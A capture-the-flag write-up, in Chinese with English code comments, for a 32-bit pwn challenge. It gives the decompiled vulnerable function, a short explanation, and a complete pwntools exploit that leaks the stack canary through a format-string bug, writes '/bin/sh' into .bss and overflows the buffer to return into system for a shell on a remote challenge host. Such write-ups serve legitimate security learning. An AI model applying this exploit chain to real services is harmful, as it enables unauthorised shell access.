fmt_text(格式化+canary绕过+栈溢出)

题目:

/*
 * Program entry point (IDA decompilation of the challenge binary).
 * init() is not shown in this listing (presumably I/O setup — confirm in
 * the binary); yichu() is where both user inputs are read and where the
 * vulnerabilities live. argc/argv/envp are never used.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  init();   /* helper defined elsewhere in the binary */
  yichu();  /* two gets()/printf(s) pairs: format-string bug + stack overflow */
  return 0;
}

/*
 * Vulnerable routine (IDA decompilation). The bracketed offsets in the
 * local declarations are IDA's stack-layout annotations and are exactly
 * what the exploit below is derived from, so keep them.
 *
 * Two defects, each reachable twice:
 *   - gets(s) reads an unbounded line into the 100-byte buffer s
 *     (stack overflow; gets() stops only at '\n' / EOF, never at NUL).
 *   - printf(s) uses attacker-controlled input as the format string
 *     (format-string bug: stack leak via %N$p, arbitrary write via %n).
 *
 * Layout (from IDA): s at ebp-0x70, canary copy v2 at ebp-0xC, so v2 sits
 * 0x70 - 0xC = 100 bytes after the start of s, i.e. immediately past the
 * end of the buffer. Saved ebp and the return address follow at ebp+0 and
 * ebp+4 (three dwords after v2). Any overflow past s therefore has to
 * reproduce the canary value, which the first printf(s) can leak.
 *
 * The decompiler renders the stack-protector check as the XOR below;
 * presumably a non-zero result aborts via __stack_chk_fail in the real
 * epilogue (the value is not otherwise consumed) — confirm in the binary.
 */
unsigned int yichu()
{
  char s[100]; // [esp+8h] [ebp-70h] BYREF
  unsigned int v2; // [esp+6Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);  /* stack canary, copied from gs:0x14 (glibc i386 TLS slot) */
  gets(s);                    /* input #1: used to leak the canary ("%31$p" in the exploit) */
  printf(s);
  gets(s);                    /* input #2: %n write into .bss + overflow of s past v2 */
  printf(s);
  return __readgsdword(0x14u) ^ v2;  /* 0 iff the canary is intact */
}

思路:

先利用第一次 gets/printf 的格式化字符串漏洞（`%31$p`，s 位于第 6 个参数，canary 在其后 100/4 = 25 个槽位）泄露 canary 的值；再在第二次输入中用 fmtstr_payload 通过 %n 把 /bin/sh 写入位于 bss 段的 buf（0x804A080），并把整条 payload 填充到 100 字节后依次接上泄露的 canary（绕过栈保护）、3 个 dword 的填充和 system 的地址，使函数返回时以 buf 为参数调用 system("/bin/sh")。注意格式化部分必须放在 canary 之前（printf 会在 canary 的 0x00 低字节处停止解析），且 gets 以换行符结束，canary 含 0x0a 时需重连重试。

exp:

from pwn import *
from LibcSearcher import *
import base64
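# 32-bit target: fmtstr_payload() and p32() size their output from the pwntools
# context, so pin it to the binary instead of guessing (the old commented-out
# context(arch="amd64") would have produced 8-byte addresses and broken the %n write).
elf = ELF("./pwn")
context.binary = elf

# `python exp.py LOCAL` runs ./pwn locally (handy together with gdb.attach);
# the default is the remote instance, as before.
if args.LOCAL:
    r = process("./pwn")
else:
    r = remote("1.95.36.136", 2061)

# Stack layout of yichu(), taken from the IDA listing:
#   s      at ebp-0x70  (100-byte buffer filled by gets())
#   canary at ebp-0x0C  -> 0x70 - 0x0C = 100 bytes after the start of s
#   ebp-8, ebp-4, saved ebp -> 3 dwords between the canary and the return address
CANARY_OFF = 0x70 - 0xC  # 100: bytes from s[0] to the canary
AFTER_CANARY = 4 * 3     # ebp-8, ebp-4, saved ebp

buf = 0x804A080          # writable .bss slot that will receive "/bin/sh"
system = 0x8048460       # hard-coded; presumably the PLT stub of system — cross-checked below
FMT_ARG = 6              # s starts at printf vararg #6 (empirical); canary is 100/4 = 25 slots later
CANARY_ARG = FMT_ARG + CANARY_OFF // 4  # -> 31, i.e. "%31$p"

# Sanity check the hard-coded address against the binary when the symbol is there.
if "system" in elf.plt and elf.plt["system"] != system:
    log.warning(f"hard-coded system {system:#x} != elf.plt['system'] {elf.plt['system']:#x}")

# ---- stage 1: leak the canary through the first printf(s) ----
# Wrap the leak in unique delimiters so parsing does not depend on how the
# reply is fragmented across recv() calls or on anything init() may print first.
r.sendline(f"<%{CANARY_ARG}$p>".encode())
r.recvuntil(b"<")
canary = int(r.recvuntil(b">", drop=True), 16)
log.info(f"canary = {canary:#x}")
# glibc i386 canaries carry a zero low byte; anything else means the %N$p offset is off.
if canary & 0xFF:
    log.warning(f"leaked value {canary:#x} has a non-zero low byte; check CANARY_ARG")

# ---- stage 2: one line that (a) writes "/bin/sh" into buf via %n and
#      (b) overflows s past the canary into the return address ----
# The format-string part MUST come first: printf stops at the canary's NUL low
# byte, so nothing placed after the canary is ever parsed as a format.
fmt = fmtstr_payload(FMT_ARG, {buf: "/bin/sh"})  # NUL terminator assumed from zeroed .bss — TODO confirm
log.info(f"fmtstr payload is {len(fmt)} bytes (must be <= {CANARY_OFF})")
if len(fmt) > CANARY_OFF:
    raise ValueError(f"format payload ({len(fmt)} bytes) would overrun the canary at +{CANARY_OFF}")

payload = (
    fmt.ljust(CANARY_OFF, b"a")  # pad up to (not over) the canary; was a hard-coded b'a'*4
    + p32(canary)                # restore the canary so the stack-protector check passes
    + b"a" * AFTER_CANARY        # ebp-8, ebp-4, saved ebp
    + p32(system)                # return into system(...)
    + p32(0)                     # fake return address for system()
    + p32(buf)                   # its argument: our "/bin/sh" in .bss
)
# gets() stops at '\n', so a canary (or address) containing 0x0a would truncate
# the line; reconnecting yields a fresh canary.
if b"\n" in payload:
    raise ValueError("payload contains 0x0a (probably inside the canary); reconnect and retry")

r.sendline(payload)
r.interactive()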
